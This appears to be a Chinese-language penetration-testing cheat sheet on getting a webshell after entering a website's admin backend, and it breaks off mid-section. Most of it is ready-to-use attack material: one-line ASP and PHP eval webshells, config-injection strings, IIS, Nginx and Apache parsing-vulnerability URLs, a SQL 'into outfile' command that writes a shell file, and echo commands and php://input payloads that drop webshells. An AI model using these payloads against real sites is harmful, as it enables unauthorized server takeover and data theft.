Getshell分为进管理员后台Getshell和不进后台Getshell,本文主要总结常见进后台Getshell和部分。
进后台Getshell
管理员后台直接Getshell
管理员后台直接上传Getshell,有时候带密码的Webshell连接时容易被waf拦截,可以上传不加密的Webshell如有权限限制可以尝试管理后台自带的修改文件名功能在文件名前加../来穿越目录,如上传的文件为a.php,将a.php修改为../a.php。
后台数据库备份Getshell
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库,比如通过新建管理员用户,将用户名用一句话木马代替(用户名通常有长度限制,在前端修改maxlength即可),<%eval request ("pass")%>
然后再通过备份数据库后访问此界面Getshell。
各类上传Getshell
https://choge.top/2020/02/29/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%AB%98%E7%BA%A7%E5%88%A9%E7%94%A8/
修改网站上传类型Getshell
修改网站上传类型,后台设置中添加aasps|asp|php|jsp|aspx|asa|cer,保存后上传aasps文件,上传后为asp文件可以解析Getshll
上传其他脚本类型Getshell
一台服务器有多个站,如a网站为asp脚本,b网站为php脚本,而a中限制了上传文件类型为asp的文件,此时可以上传php的脚本,来拿shell;也可以尝试脚本文件后缀名改为asa或者在后面直接加个.如xx.asp.来突破文件类型限制进行上传来Getshell
解析漏洞Getshell
IIS6.0解析漏洞
http://www.xxx.com/xx.asp/xx.jpg
http://www.xxx.com/xx.asp/xx.txt
http://www.xxx.com/xx.asp/xx.asp;jpg
IIS7.0/7.5、Nginx<8.0解析漏洞
http://www.xxx.com/xx.jpg/.php
Nginx<8.03空字节代码执行漏洞
版本范围:Nginx0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
http://www.xxx.com/xx.jpg%00.php
Apache解析漏洞
http://www.xxx.com/xx.php.owf.rar
逆向解析,直到能解析出php为止
CVE-2013-4547 Nginx解析漏洞
http://www.xxx.com/xx.jpg(非编码空格)\0.php
编辑器漏洞Getshell
传送门:
https://navisec.it/%e7%bc%96%e8%be%91%e5%99%a8%e6%bc%8f%e6%b4%9e%e6%89%8b%e5%86%8c/
网站配置插马Getshell
进入后台后,网站配置插马getshell,可以找到源码本地搭建,插入时注意与源码闭合,如果插入出错可能导致网站报废。如asp中单引号表示单行注释作用
"%><%eval request("v01cano")%><%'
编辑器模版Getshell
通过网站的模版编写一句话,然后生成脚本文件getshell 通过将木马添加到压缩文件,把名字改为网站的模版类型,上传到服务器,getshell)(新建或修改目录名为xx.asp/ 此目录下的jsp,html会以asp执行,配置iis6.有0解析漏洞
修改脚本文件Getshell
修改后台脚本文件插入一句话直接Getshell,尽量插在头和尾。
上传插件、更新页面Getshell
wordpress,dz等,如编辑wordpress404页面插入一句话,可以先下载对应版本找到404路径,部分OA上传插件Getshell, jboss,tomcat上传war包getshell等
执行sql语句写入Webshell
首先执行错误的sql语句,使其暴露出网站的根目录,以ecshop为例,进入后台执行sql查询
select "<?php phpinfo();?>" into outfile "C:\\vulcms\\ecshopv3.6\\ecshop\\v01cano.php";
关于此语句说明,在windows中有时候需要使用斜杠/有时候需要使用双反斜杠\末尾有时候需要分号,有时候也不需要分号。也可以先将一句话通过ecshop的新建管理员写入到user表中,然后通过数据库备份配合解析漏洞Getshell。
命令执行Getshell
Windows
echo ^<^?php @eval($_POST[C0cho]);?^>^ >c:\1.php
Linux
echo -e "<?php @assert(\$_POST[C0cho])?>" > 1.php
Linux需要在$前加\进行防转义,Windows需要在<前加^防转义,Windows和Linux中的 “可以使用’或不使用进行尝试
文件包含Getshell
文件包含有时可绕过waf
asp包含
include file="123.jpg"
调用的文件必须和被调用的文件在同一目录,否则找不到,如果不在同一目录,用下面语句也使用如下代码
include virtual="文件所在目录/123.jpg"
php包含
<?php include('123.jpg'); ?>
使用php://input
使用burpsuite截取数据包,并修改内容转发(还可以使用hackbar工具中的post data中输入<?php fputs(fopen("shell1.php","w"),'1111<?php @assert($_POST[xss])?>2222')?>
等一句话木马)
截取get请求